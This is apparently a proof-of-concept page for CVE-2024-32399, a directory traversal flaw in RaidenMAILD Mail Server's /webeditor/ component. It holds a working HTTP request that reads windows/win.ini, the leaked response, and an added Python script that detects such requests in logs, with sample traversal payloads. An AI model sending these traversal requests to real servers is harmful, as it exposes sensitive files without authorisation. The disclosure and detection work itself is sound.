CVE-2024-32399 PoC — RaidenMAILD Mail Server Security Vulnerability

Source
Associated Vulnerability
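Title: RaidenMAILD Mail Server Security Vulnerability (CVE-2024-32399)
Description: RaidenMAILD Mail Server is an easy-to-use SMTP/POP3/IMAP4/WebMail mail server from RaidenMAILD. RaidenMAILD Mail Server v.4.9.4 and earlier contain a security vulnerability caused by a directory traversal flaw. An attacker can exploit it to obtain sensitive information via the /webeditor/ component.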
Readme
# CVE-2024-32399

## Vulnerability Overview
A directory traversal vulnerability in RaidenMAILD Mail Server v.4.9.4
and before allows a remote attacker to obtain sensitive information via
the /webeditor/ component.


## Vulnerability Type
Directory Traversal


## Vendor of Product
RaidenMAILD Mail Server


## Affected Version
RaidenMAILD Mail Server <= 4.9.4


## Proof of Concept
Request:
```http
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close
```

Response:
```http
HTTP/1.1 200 OK
Connection: close
Content-Disposition: attachment; filename="../../../windows/win.ini";
Content-Type: application/octet-stream
Content-Length: 403
Date: Mon, 22 Apr 2024 15:00:41 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Permissions-Policy: geolocation=(self "https://example.com"), microphone=()
Referrer-Policy: no-referrer
Content-Security-Policy: base-uri 'self'
Set-Cookie: IDHTTPSESSIONID=9E5BgVAlG7P7C5X; Path=/

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...
...
```
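
For triage, the request and response above can be turned into two checks: does a logged path addressed to `/webeditor/` resolve outside it, and does a `Content-Disposition` filename carry `..` segments. This is an added example, not part of the original README or the vendor's code; it generalizes beyond the single request shown by also decoding percent-encoded and backslash forms. The log layout (combined log format from a front-end that records the raw path) and all sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

PREFIX = "/webeditor/"  # component named in the advisory
# Assumed log layout: combined log format from a front-end that logs the raw path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def escapes_prefix(raw_path, prefix=PREFIX):
    """True if the path is addressed to prefix but resolves outside it."""
    path = raw_path.split("?", 1)[0]
    for _ in range(2):  # undo single and double percent-encoding
        path = unquote(path)
    # Windows host: accept both separators and compare case-insensitively.
    path = path.replace("\\", "/").lower()
    if not path.startswith(prefix):
        return False
    return not (posixpath.normpath(path) + "/").startswith(prefix)

def disposition_leaks_traversal(header_value):
    """True if a Content-Disposition filename contains '..' segments."""
    m = re.search(r'filename="([^"]*)"', header_value)
    return bool(m) and ".." in m.group(1).replace("\\", "/").split("/")

def scan(lines):
    """Return (client, path, status) for each logged request that escapes PREFIX."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and escapes_prefix(m["path"]):
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Apr/2024:15:00:41 +0000] "GET /webeditor/../../../windows/win.ini HTTP/1.1" 200 403',
    '192.0.2.11 - - [22/Apr/2024:15:01:02 +0000] "GET /webeditor/img/../style.css HTTP/1.1" 200 1820',
    '198.51.100.7 - - [22/Apr/2024:15:02:13 +0000] "GET /webeditor/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 404 0',
    '192.0.2.11 - - [22/Apr/2024:15:03:30 +0000] "GET /webmail/login HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, path, status in scan(SAMPLE_LOG):
        # A 200 means a file outside the component was returned: triage first.
        print(f"{'SERVED' if status == 200 else 'not served'}  {ip}  {path}")
```

Hits with status 200 are the ones to review first, since the server returned content for a path outside the component.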
File Snapshot

[4.0K] /data/pocs/4646c1bfc74e22ad244ba4fda8a1ad86509cec89
└── [1.1K] README.md

0 directories, 1 file